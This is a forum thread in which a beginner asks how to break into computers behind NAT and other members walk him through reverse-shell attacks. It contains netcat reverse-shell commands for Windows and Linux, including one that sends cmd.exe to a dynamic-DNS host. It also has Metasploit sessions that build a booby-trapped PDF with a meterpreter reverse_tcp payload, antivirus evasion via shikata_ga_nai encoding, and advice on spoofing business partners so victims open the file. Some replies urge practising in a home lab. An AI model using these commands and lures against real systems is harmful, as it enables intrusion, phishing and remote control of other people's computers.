how to penetrate pc through NAT ??

Viewing 37 reply threads
  • Author
    Posts
    • #4963
      rebrov
      Participant

      i’ll suppose i have 4 pc’s in my network and ofcourse using NAT protocol to translate all my 4 addresses to 1 Puplic ip

      well the Question is is there any chance to penetrate my network through NAT ?

      and how to do it ?

    • #31329
      kriscamaro68
      Participant

      @rebrov wrote:

      i’ll suppose i have 4 pc’s in my network and ofcourse using NAT protocol to translate all my 4 addresses to 1 Puplic ip

      well the Question is is there any chance to penetrate my network through NAT ?

      and how to do it ?

      I would think it would be possible through a social engineering attack of sorts by sending the user an e-mail which they click that installs some sort of software or maybe has a link to a site that infects the computer. Other then that I wouldn’t know cause I am still to new at this stuff. Maybe someone else could shed some more light on it.

    • #31330
      n1p
      Participant

      Yes, you may need to initiate a connection from the internal network/PCs. However NAT routers may also have running services that can exploited (remote administration/ftp). They may also forward ports to services on the client PC that may be exploited.

    • #31331
      j0rDy
      Participant

      attacks through a NAT is always done through a reverse connection cause of the fact you cannot connect directly to the machine in the network. like n1p said. if there are ports forwarded the attacker can connect to them directly…

    • #31332
      caissyd
      Participant

      To add to what j0rDy mentioned, your system could also get compromised by surfing to malicious web sites (cross-site scripting).

    • #31333
      unsupported
      Participant

      For your scenario, you can shovel a shell/reverse shell using NetCat.  How do you get NetCat on the machine from the outside?  It is so small it can fit inside a buffer overflow or you can combine it with another executable which is run on the inside.

    • #31334
      rebrov
      Participant

      yes thats right only way to use reverse telnet ot reverse trojan ,,, a connect back trojan is that right ?

      but how to use a reverse telnet connection to the target in case i can deliver the netcat to the target !?

    • #31335
      Xen
      Participant

      After you install netcat on the target machine you can create a reverse shell on the target machine that will connect to you.
      Firstly, you must  have a netacat listener running on your machine.

      Command:
      nc -l -p

      Then you make a reverse shell from the target machine connect to you.

      For windows target:
      nc -e cmd.exe
      For Linux target:
      nc -e /bin/bash
    • #31336
      rebrov
      Participant

      @Equix3n- wrote:

      After you install netcat on the target machine you can create a reverse shell on the target machine that will connect to you.
      Firstly, you must  have a netacat listener running on your machine.

      Command:
      nc -l -p

      Then you make a reverse shell from the target machine connect to you.

      For windows target:
      nc -e cmd.exe
      For Linux target:
      nc -e /bin/bash

      thats working only when u have physical access on the 2 machines right ?

      and also i think u have to use kinda no-ip service if the 2 machines behind NAT right ??

      but what if u dont have physical access to the machine its a penetrating not negotiating with 2 machines u own u got wat i mean ?

    • #31337
      Xen
      Participant

      You don’t have to have physical access to these machine to launch a reverse shell. You can try for client side exploits and get the shell. It’s all done remotely.

    • #31338
      rebrov
      Participant

      @Equix3n- wrote:

      You don’t have to have physical access to these machine to launch a reverse shell. You can try for client side exploits and get the shell. It’s all done remotely.

      exploits ? what do u mean i can’t exploit it yet cuz its natted !!

      how can i exploit it if its natted in the first place ?

    • #31339
      hayabusa
      Participant

      @rebrov

      To exploit a machine by NAT, you will have to get the remote user to access a malicious webpage, send an email that deceives them into opening a malicious attachment, or otherwise find a way to manipulate the remote user into executing code to create your reverse shell or otherwise give you access.  That’s why they said “You can try for client side exploits…”  You need to find some vulnerability on the client machine that either auto-executes malicious code, or tricks the user into running it, so you can gain access.  Aside of those, unless you gain physical access to a machine behind the NAT, and run code yourself, there won’t be a way to exploit the clients behind NAT, as you cannot directly connect to them from outside, without a reverse shell.

    • #31340
      Xen
      Participant

      The goal of client-side exploits is to make the victim initiate an outbound connection to you. Here we try to exploit the applications installed on the victim’s computer. The only drawback of this method is that you’ve to rely on the victim to access your machines or run your code. Furthermore you’ve to guess what software the victim might be running.
      You’ve a server that serves exploits to the client machines connecting to it. You send a script/URL to the victim which makes the appropriate client machine to connect to the attacker’s server. The server then exploits the client connecting to it.
      For eg. suppose you know that a user is not very security conscious. He rarely update his system and is probably still using IE6. You send him a fake email which contains a link/script to your server that serves an appropriate IE6 exploit. When the user clicks on your URL and visits your server his browser is exploited to spawn a reverse shell to you.

      As a side note, it will be good for you if you try to learn somethings from yourself too. I had already told you that client side exploits is the way to go here. You could have googled for client-side exploits which would’ve given you more detailed articles. Learning from a forum is only beneficial if you make some efforts from your side too. No one will spoon fed you, you can only be given pointers. I do not mean to discourage you from asking questions, you’ll be helped in the future also, but want you to learn somethings yourself too.

      Edit: I didn’t mean to be rude. It’s just that English isn’t my primary language, so I may not have expressed my emotions clearly.

    • #31341
      rebrov
      Participant

      @Equix3n- wrote:

      The goal of client-side exploits is to make the victim initiate an outbound connection to you. Here we try to exploit the applications installed on the victim’s computer. The only drawback of this method is that you’ve to rely on the victim to access your machines or run your code. Furthermore you’ve to guess what software the victim might be running.
      You’ve a server that serves exploits to the client machines connecting to it. You send a script/URL to the victim which makes the appropriate client machine to connect to the attacker’s server. The server then exploits the client connecting to it.
      For eg. suppose you know that a user is not very security conscious. He rarely update his system and is probably still using IE6. You send him a fake email which contains a link/script to your server that serves an appropriate IE6 exploit. When the user clicks on your URL and visits your server his browser is exploited to spawn a reverse shell to you.

      As a side note, it will be good for you if you try to learn somethings from yourself too. I had already told you that client side exploits is the way to go here. You could have googled for client-side exploits which would’ve given you more detailed articles. Learning from a forum is only beneficial if you make some efforts from your side too. No one will spoon fed you, you can only be given pointers. I do not mean to discourage you from asking questions, you’ll be helped in the future also, but want you to learn somethings yourself too.

      no no u were so Gentel guys and helpful from my side i will try to search more and learn more about client-side i’ll tell u what im gonna get later thanks guys for information 🙂

    • #31342
      sil
      Participant

      @rebrov wrote:

      no no u were so Gentel guys and helpful from my side i will try to search more and learn more about client-side i’ll tell u what im gonna get later thanks guys for information 🙂

      Take a different approach here in understanding this from a non-technological perspective. This allows you to understand the concept more…

      Technological approach
      Client
      Server

      Non-tech approach
      Client – someone paying you for something
      Vendor (server) – someone offering a service

      On the non-tech side, you as a vendor are providing say water. You’d like your client to buy (run software) water (exploit). How would you get the client to try your tasty water. Offer it to them for free. People like free.

      Tech approach
      Enumerate – either technically or socially – any potential services you think your client is running. Familiarize yourself somehow with his internals. Send them an email with an embedded picture:

      What does this do for you? If you’re running your own webserver, you could check your logs to see the useragent on his browser. Say you see the following:

      "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"

      You now know whomever opened that email is using IE 6.0 to surf the Internet. How do you cause your client (that machine) to open something innocuously and run code? Search for something that could potentially affect his browser. The client would run code and open a shell to you given the right parameters.

      Client side: What could that person be running inside their network? If I send them a loaded PDF would I get a shell. If I sent them a heapspraying IE exploit targeted at IE 6.0 would I be able to come OUT from them TO wherever I need them to connect to?

      Can I social engineer them to open a loaded file for me? Enumerate THEIR clients and business partners. Send them a loaded PDF spoofing one of their clients, business partners, co-workers. Get them to open up something you’ve created to exploit the client side. The key is to get them to run something. Could be a variety of things, use your imagination. What would get YOU TO OPEN a file or check a website?

    • #31343
      hayabusa
      Participant

      @sil – you worded that extremely well for rebrov!

      Sometimes, you just need to think outside of the box, rebrov.  There have been many times I wish I could just hammer, directly, on a target machine, and exploit it, during pentests.  But you have to realize that there will be MANY times when there just aren’t any open services / targets to hit, in a direct manner.  So you need to think outside the box, and find a way to let THEM come to YOU.

      Be patient, and spend a good amount of time learning about the client-side (btw, often times, it’s MUCH easier to access a target by means of client-side / social exploitation, than it ever would be to try to directly attack.)  Very often, the end user is the weakest link in network security, as, without good, formal training included in a company’s security posture and plans, the end user is generally VERY easily manipulated.

    • #31344
      rebrov
      Participant

      WooW i already knew now how to do a client side attack with Metasploit

      i read it on Offensive security web site its wonderfull

      the question now is : –

      while creating malicious pdf file to send out to victim as reverse connection check out this command in Meta

      msf > use exploit/windows/fileformat/adobe_utilprintf
      msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
      FILENAME => BestComputers-UpgradeInstructions.pdf
      msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
      LHOST => 192.168.8.128
      msf exploit(adobe_utilprintf) > set LPORT 4455
      LPORT => 4455
      msf exploit(adobe_utilprintf) > show options

      at the LPORT part i think i should open this port at router to pass the reverse traffic from the victim to me right at the reverse connection after the victim execute the file

      so the question should i open this port also at router and define my local ip on this port to pass the traffic to get successful reverse connection ?

    • #31345
      sil
      Participant

      @rebrov wrote:

      msf > use exploit/windows/fileformat/adobe_utilprintf
      msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
      FILENAME => BestComputers-UpgradeInstructions.pdf
      msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
      LHOST => 192.168.8.128
      msf exploit(adobe_utilprintf) > set LPORT 4455
      LPORT => 4455
      msf exploit(adobe_utilprintf) > show options

      at the LPORT part i think i should open this port at router to pass the reverse traffic from the victim to me right at the reverse connection after the victim execute the file

      so the question should i open this port also at router and define my local ip on this port to pass the traffic to get successful reverse connection ?

      Just so you know, most antivirus software will detect most metasploit client side exploits. At least Kaspersky Symantec, Trend Micro, Avast and a few others. Again, go back to the client/server analogy and think about this for a moment.

      In a controlled environment, say an enterprise, you’re almost likely to have filtering on a firewall, IPS, IDS side which WON’T allow internal machines to connect to too many EXTERNAL ports. Meaning, why would you allow one of your users (if you’re the admin) to connect to say a non business associated port. Typically 80, 21, 3128, 8080, 110, etc. The likelihood of the exploit working even IF you got through antivirus is slim.

      msfencode -e x86/shikata_ga_nai is your friend. LPORT I typically configure for port 80 when I use metasploit since it’s a webserver and usually allowed as a firewall, IPS, IDS rule to connect TO (server) the world FROM (client) the enterprise.

      Familiarize yourself with the following chart:

      http://cwe.mitre.org/documents/sources/WASCThreatClassificationTaxonomyGraphic.pdf

      Watch the following video:
      http://pentest.cryptocity.net/client-sides/

      Also worth reading:
      http://www.offensive-security.com/metasploit-unleashed/Antivirus-Bypass
      http://seclists.org/metasploit/2010/q2/22

      You seem to want “right now!” and it involves a lot more than simply wondering which port to pick which application to run. It involves a lot of understanding on the processes involved in interconnection and how systems operate. “What would the system do… How does it do it? What would happen if I…?” These are questions you should ask and be able to answer to make things easier as time progresses. Make yourself a quick checklist slash to do list and follow a procedure. Find your errors and try to minimize those. After a while it becomes easier.

      E.g.:

      Goal exploit the client side
      Step 1) Determine an attack vector
      Step 2) Determine how that attack vector plays out
      Step 3) Document how it would work for you
      Step 4) Try it on yourself
      Step 5) Did it work, jot down why it did or didn’t
      Step 6) Attempt to exploit
      Step 7) Record and analyze results

      Explained…
      Step 1) Determine how you propose to get in. So you chose to send them a loaded PDF

      Step 2) How do you envision delivering and getting them to open up the PDF

      Step 3) Jot down EXACTLY what you perceive happening

      Step 4) Send yourself the exploit in a controlled environment

      Step 5) What happened when you tried to exploit yourself. Did your antivirus cry foul. Was the connection successful. Did it allow you to connect BACK to the port you specified. Why or why not?

      Step 6) All worked for you… Send out the exploit

      Step 7) Did it work. If it did, you now have a repeatable procedure you can follow on other pentesting adventures. If not, rinse and repeat.

    • #31346
      rebrov
      Participant

      @sil wrote:

      @rebrov wrote:

      msf > use exploit/windows/fileformat/adobe_utilprintf
      msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
      FILENAME => BestComputers-UpgradeInstructions.pdf
      msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
      LHOST => 192.168.8.128
      msf exploit(adobe_utilprintf) > set LPORT 4455
      LPORT => 4455
      msf exploit(adobe_utilprintf) > show options

      at the LPORT part i think i should open this port at router to pass the reverse traffic from the victim to me right at the reverse connection after the victim execute the file

      so the question should i open this port also at router and define my local ip on this port to pass the traffic to get successful reverse connection ?

      Just so you know, most antivirus software will detect most metasploit client side exploits. At least Kaspersky Symantec, Trend Micro, Avast and a few others. Again, go back to the client/server analogy and think about this for a moment.

      In a controlled environment, say an enterprise, you’re almost likely to have filtering on a firewall, IPS, IDS side which WON’T allow internal machines to connect to too many EXTERNAL ports. Meaning, why would you allow one of your users (if you’re the admin) to connect to say a non business associated port. Typically 80, 21, 3128, 8080, 110, etc. The likelihood of the exploit working even IF you got through antivirus is slim.

      msfencode -e x86/shikata_ga_nai is your friend. LPORT I typically configure for port 80 when I use metasploit since it’s a webserver and usually allowed as a firewall, IPS, IDS rule to connect TO (server) the world FROM (client) the enterprise.

      Familiarize yourself with the following chart:

      http://cwe.mitre.org/documents/sources/WASCThreatClassificationTaxonomyGraphic.pdf

      Watch the following video:
      http://pentest.cryptocity.net/client-sides/

      Also worth reading:
      http://www.offensive-security.com/metasploit-unleashed/Antivirus-Bypass
      http://seclists.org/metasploit/2010/q2/22

      You seem to want “right now!” and it involves a lot more than simply wondering which port to pick which application to run. It involves a lot of understanding on the processes involved in interconnection and how systems operate. “What would the system do… How does it do it? What would happen if I…?” These are questions you should ask and be able to answer to make things easier as time progresses. Make yourself a quick checklist slash to do list and follow a procedure. Find your errors and try to minimize those. After a while it becomes easier.

      E.g.:

      Goal exploit the client side
      Step 1) Determine an attack vector
      Step 2) Determine how that attack vector plays out
      Step 3) Document how it would work for you
      Step 4) Try it on yourself
      Step 5) Did it work, jot down why it did or didn’t
      Step 6) Attempt to exploit
      Step 7) Record and analyze results

      Explained…
      Step 1) Determine how you propose to get in. So you chose to send them a loaded PDF

      Step 2) How do you envision delivering and getting them to open up the PDF

      Step 3) Jot down EXACTLY what you perceive happening

      Step 4) Send yourself the exploit in a controlled environment

      Step 5) What happened when you tried to exploit yourself. Did your antivirus cry foul. Was the connection successful. Did it allow you to connect BACK to the port you specified. Why or why not?

      Step 6) All worked for you… Send out the exploit

      Step 7) Did it work. If it did, you now have a repeatable procedure you can follow on other pentesting adventures. If not, rinse and repeat.

      thanks for the information ,, what i did figured out when i tried netcat with my friend at the following commands

      nc -lvp 80 “at my pc”

      and :

      nc “no-ipdns.biz” 80 -e cmd.exe

      at my friend pc and after i excuted the command there nothing happen at my pc i didnt’t get the cmd reverse shell dunno

      the question here : i tried this at no-ip cuz im already natted too me and him so should i do this through openning port in router ??

      cuz he is natted and im natted how to do this ?

    • #31347
      What90
      Participant

      You’ll need to work out on your router how to do port forwarding for inbound tcp 80 to your computer with netcat on it.

      This does place a certain risk by opening up port 80 to your machine, so make sure your machine is fully patched before trying this.

      I think you may want to go with sil’s advice and set this up at home first and practice it on your local network.

    • #31348
      rebrov
      Participant

      @What90 wrote:

      You’ll need to work out on your router how to do port forwarding for inbound tcp 80 to your computer with netcat on it.

      This does place a certain risk by opening up port 80 to your machine, so make sure your machine is fully patched before trying this.

      I think you may want to go with sil’s advice and set this up at home first and practice it on your local network.

      that what i meant so my question is

      is there anyway to reverse connection to natted pc like mine without port forward ?? cuz i know that traffic coming from the reverse connection should  be passed by the router to my pc ! but  im wondering is there anyway to do the same process without openinning port in my router for incoming traffic !! ?

    • #31349
      Xen
      Participant

      @rebrov wrote:

      that what i meant so my question is

      is there anyway to reverse connection to natted pc like mine without port forward ?? cuz i know that traffic coming from the reverse connection should  be passed by the router to my pc ! but  im wondering is there anyway to do the same process without openinning port in my router for incoming traffic !! ?

      You’ll have to forward a port from your router to PC otherwise you’re just making the reverse shell connect to your router and not your PC. The connection stops at your router. This is what happens when you try to scan through a NAT. Since ports aren’t forwarded you end up scanning the router. If there had been a workaround then you wouldn’t have needed client-side exploits for NAT configurations.
      Forwarding the port shouldn’t be a problem to you as long as your system is completely patched and you do it for a small duration only. So once you get a reverse shell from your friend’s computer you can close the port again. After this the ideal approach should be to practice this stuff in your home lab. You can practice in a controlled manner and without the probability of you being compromised. You can build various scenarios and firewalls and routers to your test lab. There’s a lot of free stuff available like vyatta routers that’ll help you completely replicate a physical environment. And it’s all very cheap too 😀

    • #31350
      rebrov
      Participant

      @Equix3n- wrote:

      @rebrov wrote:

      that what i meant so my question is

      is there anyway to reverse connection to natted pc like mine without port forward ?? cuz i know that traffic coming from the reverse connection should  be passed by the router to my pc ! but  im wondering is there anyway to do the same process without openinning port in my router for incoming traffic !! ?

      well mone is issue for me :S lol

      but i wonder then how the team viewer and other software working like it without port forward  🙂 how it work ?

      and thanks to the information i already understaned how the client-side attack work 🙂
      You’ll have to forward a port from your router to PC otherwise you’re just making the reverse shell connect to your router and not your PC. The connection stops at your router. This is what happens when you try to scan through a NAT. Since ports aren’t forwarded you end up scanning the router. If there had been a workaround then you wouldn’t have needed client-side exploits for NAT configurations.
      Forwarding the port shouldn’t be a problem to you as long as your system is completely patched and you do it for a small duration only. So once you get a reverse shell from your friend’s computer you can close the port again. After this the ideal approach should be to practice this stuff in your home lab. You can practice in a controlled manner and without the probability of you being compromised. You can build various scenarios and firewalls and routers to your test lab. There’s a lot of free stuff available like vyatta routers that’ll help you completely replicate a physical environment. And it’s all very cheap too 😀

    • #31351
      Xen
      Participant

      You do not need any expensive stuff to build your ‘virtual’ test lab. In fact most of the stuff in my lab is absolutely free. You can find various open source counterparts of commercial tools.
      There are various ‘free’ virtualization products available like virtualbox, vmware player and vmware server. I’m a big fan of vmware products. Personally, I believe that vmware server will be enough for what you want to do. Vmware server is a stripped down version of the excellent commercial vmware workstation but contains almost all the basic features you’ll require. You can download pre-built linux virtual machines from the vmware website http://www.vmware.com/appliances/directory/
      There’s also a free route to get Windows OS. Either you can download the OS from Microsoft’s website which comes with around 3 month trial period. Furthermore, you can also download Windows XP SP2 virtual machine from  NIST’s website http://www.offensive-security.com/metasploit-unleashed/windows-xp-machine-setup
      As for the softwares like ftp, telnet daemons and webservers etc…well most of them are free anyway  😀

      Jhaddix and Laz3r have posted wonderful tutorials to build a virtual test lab. You can get them here:-
      Network pentest lab setup
      Pentest Lab: Web Application Edition

      Additionally, you can practice on ready made targets like De-ICE live disks, hackerdemia and pWnOS all of which are available here http://forums.heorot.net/  You also have LAMP security disks http://sourceforge.net/projects/lampsecurity/  Also try your hands at the ‘Skillz’ section of this forum http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/board,12.0/ They will test your limits.
      There’s also a topic here at EHNet which will direct you to more stuff for practicing http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5043.0/

      As for the other part of your question.
      Teamviewer does not make you connect to the remote computer directly (Not until you both are on the same network). When you initiate a connection to a remote computer, you and the remote computer are in fact connected to the teamviewer server. So all the data flows through the server and you don’t have to forward any ports or worry about the firewall rules  ::)

      I hope that solved some of your problems 🙂

    • #31352
      rebrov
      Participant

      @Equix3n- wrote:

      You do not need any expensive stuff to build your ‘virtual’ test lab. In fact most of the stuff in my lab is absolutely free. You can find various open source counterparts of commercial tools.
      There are various ‘free’ virtualization products available like virtualbox, vmware player and vmware server. I’m a big fan of vmware products. Personally, I believe that vmware server will be enough for what you want to do. Vmware server is a stripped down version of the excellent commercial vmware workstation but contains almost all the basic features you’ll require. You can download pre-built linux virtual machines from the vmware website http://www.vmware.com/appliances/directory/
      There’s also a free route to get Windows OS. Either you can download the OS from Microsoft’s website which comes with around 3 month trial period. Furthermore, you can also download Windows XP SP2 virtual machine from  NIST’s website http://www.offensive-security.com/metasploit-unleashed/windows-xp-machine-setup
      As for the softwares like ftp, telnet daemons and webservers etc…well most of them are free anyway  😀

      Jhaddix and Laz3r have posted wonderful tutorials to build a virtual test lab. You can get them here:-
      Network pentest lab setup
      Pentest Lab: Web Application Edition

      Additionally, you can practice on ready made targets like De-ICE live disks, hackerdemia and pWnOS all of which are available here http://forums.heorot.net/  You also have LAMP security disks http://sourceforge.net/projects/lampsecurity/  Also try your hands at the ‘Skillz’ section of this forum http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/board,12.0/ They will test your limits.
      There’s also a topic here at EHNet which will direct you to more stuff for practicing http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,5043.0/

      As for the other part of your question.
      Teamviewer does not make you connect to the remote computer directly (Not until you both are on the same network). When you initiate a connection to a remote computer, you and the remote computer are in fact connected to the teamviewer server. So all the data flows through the server and you don’t have to forward any ports or worry about the firewall rules  ::)

      I hope that solved some of your problems 🙂

      thanks alot for this inforamtion it helped alot i will check out the pentest lab to build my own 1 🙂 and try to practice more and more 🙂 thanks buddy

    • #31353
      rebrov
      Participant

      well ,,,, i have issue

      i tried this client-side attack from metasploit 3.3.3.

      and when im creating the pdf malicious file the window disappear ,,, why ?

      while at the offensive-security site it was :

      msf > use exploit/windows/fileformat/adobe_utilprintf
      msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
      FILENAME => BestComputers-UpgradeInstructions.pdf
      msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128
      LHOST => 192.168.8.128
      msf exploit(adobe_utilprintf) > set LPORT 4455
      LPORT => 4455

      msf exploit(adobe_utilprintf) > exploit

      [*] Handler binding to LHOST 0.0.0.0
      [*] Started reverse handler
      [*] Creating ‘BestComputers-UpgradeInstructions.pdf’ file…
      [*] Generated output file /pentest/exploits/framework3/data/exploits/BestComputers-UpgradeInstructions.pdf
      [*] Exploit completed, but no session was created.
      msf exploit(adobe_utilprintf) >

      why mine disappear ,, i can’t even read the loading commands at the msf cuz its running very fast and then closed

      anyway when i opened the msf directory and looked to the .pdf file i found it about 7 kb size

      my question is : at the part–> set LHOST 192.168.8.128

      i put my local LAN ip or my public NATTED ip ?????

      1st time i put my local lan ip its 10.0.0.167

      then started the multi handler to make msf lestin to reverse connection from the remote target

      msf > use exploit/multi/handler
      msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
      PAYLOAD => windows/meterpreter/reverse_tcp
      msf exploit(handler) > set LPORT 4455
      LPORT => 4455
      msf exploit(handler) > set LHOST 192.168.8.128
      LHOST => 192.168.8.128
      msf exploit(handler) > exploit

      [*] Handler binding to LHOST 0.0.0.0
      [*] Started reverse handler
      [*] Starting the payload handler.

      then i deliverd it to the remote target with no response ,,,

      tip : i changed the LPORT to 80 in both steps cuz i think that router should pass the traffic to me because its port 80 and never be closed right ??

      what might be the problem ??

    • #31354
      sil
      Participant

      @rebrov wrote:

      LHOST => 192.168.8.128

      my question is : at the part–> set LHOST 192.168.8.128

      i put my local LAN ip or my public NATTED ip ?????

      what might be the problem ??[/color]

      Constructive criticism time…

      You need to learn the differences between routable IP’s and RFC 1918 addresses. (http://www.faqs.org/rfcs/rfc1918.html) RFC 1918 addresses would never be routable across the Internet. So while you placed the L(istening)HOST address, you made it into a Local Address on the 192,168. 8.x network. So unless both you and that victim were on the same network, it would never work. I suggest understanding the differences in addressing before even going further. Networking is a fundamental MUST UNDERSTAND if you’re going to get involved with pentesting. I rank it as the TOP priority.

      I suggest learning TCP/IP and routing so here is the freebie for the week: Juniper’s Fast Track training program. It’s free and informative for anyone seeking to understand networking. You don’t need to necessarily want to aim for JNCIA certification but watching the content and reading the content will help you in the long run.

      https://learningportal.juniper.net/juniper/user_fasttrack_home.aspx

    • #31355
      rebrov
      Participant

      @sil wrote:

      @rebrov wrote:

      LHOST => 192.168.8.128

      my question is : at the part–> set LHOST 192.168.8.128

      i put my local LAN ip or my public NATTED ip ?????

      what might be the problem ??[/color]

      Constructive criticism time…

      You need to learn the differences between routable IP’s and RFC 1918 addresses. (http://www.faqs.org/rfcs/rfc1918.html) RFC 1918 addresses would never be routable across the Internet. So while you placed the L(istening)HOST address, you made it into a Local Address on the 192,168. 8.x network. So unless both you and that victim were on the same network, it would never work. I suggest understanding the differences in addressing before even going further. Networking is a fundamental MUST UNDERSTAND if you’re going to get involved with pentesting. I rank it as the TOP priority.

      I suggest learning TCP/IP and routing so here is the freebie for the week: Juniper’s Fast Track training program. It’s free and informative for anyone seeking to understand networking. You don’t need to necessarily want to aim for JNCIA certification but watching the content and reading the content will help you in the long run.

      https://learningportal.juniper.net/juniper/user_fasttrack_home.aspx

      thats why i ask doesn’t mean i dont know 🙂

      i do know that u can’t if he outside thats whyi asked

      but u still didn’t answer my question if he in diff network outside remote network so my local ip wont work right ??

      cuz after writing the script to the pdf malicious file when he activate it the script will look for the LHOST and its local ip will not go to outside cuz it will be impossible to search outside the script

      thats why i asked what should i put instead of the LHOST !! ?

      i should put the WAN ip my natted IP and with port forwarding the port i already put in the meta pdf script the reverse connection will know the way to my pc ,,,, thats what i think !

      waiting for some one to fix my knowledge

      and btw ; already passed 3 levels CCNA 🙂

    • #31356
      Xen
      Participant

      LHOST should be the external IP address of your router and LPORT is the port ‘forwarded’ from your router to your internal machine. You can’t use your local LAN I.P for LPORT because it’s a private I.P address and private addresses aren’t routable on the internet. The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for local networks.

      10.0.0.0 – 10.255.255.255
      172.16.0.0 – 172.31.255.255
      192.168.0.0 – 192.168.255.255

      Suppose your router has an external I.P address 172.16.1.1 ( I’ve used a private I.P address for this e.g as I don’t want to offend anyone) and your computer’s I.P address is 10.0.0.1
      In this case you’ll set your LHOST to 172.16.1.1 and your LPORT to a port forwarded by your router to your 10.0.0.1 computer.

      i changed the LPORT to 80 in both steps cuz i think that router should pass the traffic to me because its port 80 and never be closed right ??

      We normally use port 80 for LPORT because most firewalls allow ‘outbound’ traffic through this port and communication through this looks pretty innocuous. Though the victim’s firewall will allow a reverse shell through port 80, you won’t get it unless you forward port 80 from your router to your computer i.e you’ve to specifically allow ‘inbound’ port 80.

    • #31357
      rebrov
      Participant

      @Equix3n- wrote:

      LHOST should be the external IP address of your router and LPORT is the port ‘forwarded’ from your router to your internal machine. You can’t use your local LAN I.P for LPORT because it’s a private I.P address and private addresses aren’t routable on the internet. The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for local networks.

      10.0.0.0 – 10.255.255.255
      172.16.0.0 – 172.31.255.255
      192.168.0.0 – 192.168.255.255

      Suppose your router has an external I.P address 172.16.1.1 ( I’ve used a private I.P address for this e.g as I don’t want to offend anyone) and your computer’s I.P address is 10.0.0.1
      In this case you’ll set your LHOST to 172.16.1.1 and your LPORT to a port forwarded by your router to your 10.0.0.1 computer.

      i changed the LPORT to 80 in both steps cuz i think that router should pass the traffic to me because its port 80 and never be closed right ??

      We normally use port 80 for LPORT because most firewalls allow ‘outbound’ traffic through this port and communication through this looks pretty innocuous. Though the victim’s firewall will allow a reverse shell through port 80, you won’t get it unless you forward port 80 from your router to your computer i.e you’ve to specifically allow ‘inbound’ port 80.

      well thanks for the info

      however i didn’t figure out this part correctly

      what u want to say is … i should put the external ip of router

      lets say my ip is 10.0.0.167 so the gateway of my network should be 10.0.0.1 it not should but most Administrators put the 1st ip after the network reserved for gateway
      example :

      10.0.0.0 = network
      10.0.0.1 = gateway
      10.0.0.2 = dns
      10.0.0.167 = my ip

      so the external ip u talking about is the gateway ?? 10.0.0.1 ???

      or the NAT ip that the router configured to translate the local operations over the internet to that NAT ip

      when u configuring the NAT pool …. is that what u mean ?

      because my gateway is 10.0.0.1 and my NAT (WAN) ip is 41.xxx.xxx.xxx

      which one u mean but as my network knowledge it can’t be the 10.0.0.1 since the gateway it will route my traffic to the WAN to the outside

      but when im delivering packet from outside it will go through the WAN 41.xxx.xxx.xxx right !! ?

      so as a Meta script i should assign the WAN ip as the reverse connect back ip and port forward same port listening to my local ip

      what do u think  ?

      we all share info and knowledge here and thanks mate for co-operating with me i hope u can reply ASAP

      bye

    • #31358
      Xen
      Participant

      Your router has two interface- external and internal. Each interface has a separate I.P address. When you use ‘ipconfig’, the I.P address of the default gateway you see there is its I.P address for your INTERNAL network. This address is not routable on the internet. Even my router can have the same internal I.P address as your router and we’ll be able to communicate.

      What the world sees is the I.P address of the external interface of your router. This I.P address is your unique I.P address on the internet. It’s the one that’s used when some other system wants to connect to you.

      So in this case set LHOST to 41.x.x.x and forward LPORT from your router to your 10.0.0.167 machine.

      I don’t think that your I.P address basics are weak…it’s just that they aren’t strong ;D. Reading a IPv4 chapter from a good book will make your concepts clear.

    • #31359
      rebrov
      Participant

      @Equix3n- wrote:

      Your router has two interface- external and internal. Each interface has a separate I.P address. When you use ‘ipconfig’, the I.P address of the default gateway you see there is its I.P address for your INTERNAL network. This address is not routable on the internet. Even my router can have the same internal I.P address as your router and we’ll be able to communicate.

      What the world sees is the I.P address of the external interface of your router. This I.P address is your unique I.P address on the internet. It’s the one that’s used when some other system wants to connect to you.

      So in this case set LHOST to 41.x.x.x and forward LPORT from your router to your 10.0.0.167 machine.

      I don’t think that your I.P address basics are weak…it’s just that they aren’t strong ;D. Reading a IPv4 chapter from a good book will make your concepts clear.

      well 🙂 i already said i’ve taken CCNA course im at level 4 now 🙂

      dun have to read ipv4 again :S studied it already at the 1st level

      those levels that i already got Certificate on :

      1-Network Fundamentals

      2-Routing Protocols and Concepts

      3-LAN Switching and Wireless

      still need to pass the : 4-Accessing the WAN course

      so i can go for the final CCNA exam 🙂

      but whats make my info kinda weak that i didn’t follow lvl 1  when i finish lvl i go for next and dont practice for the earlier lvls 🙂

      thanks mate anyway

    • #31360
      rebrov
      Participant

      another question : if i dont have access to the router and i specified port 8080

      as LPORT and as LHOST i assigned my WAN external ip

      now when the reverse connection back again to my router which local ip will choose to pass the traffic !!!! because i think that all Lan ips should have port 80 open and allowed for incoming traffic from outside

      second question what if i opened port and forwarded it to my local ip

      and i did the same port to another ip !! ?

      what should be happen ?

      the router will flood the frame ( broadcast ) to all local ips except the one came from and when my ip gets the frame while im at handler listener mode i will receive it ??

      what do u think ??

    • #31361
      Xen
      Participant

      another question : if i dont have access to the router and i specified port 8080

      as LPORT and as LHOST i assigned my WAN external ip

      now when the reverse connection back again to my router which local ip will choose to pass the traffic !!!!  

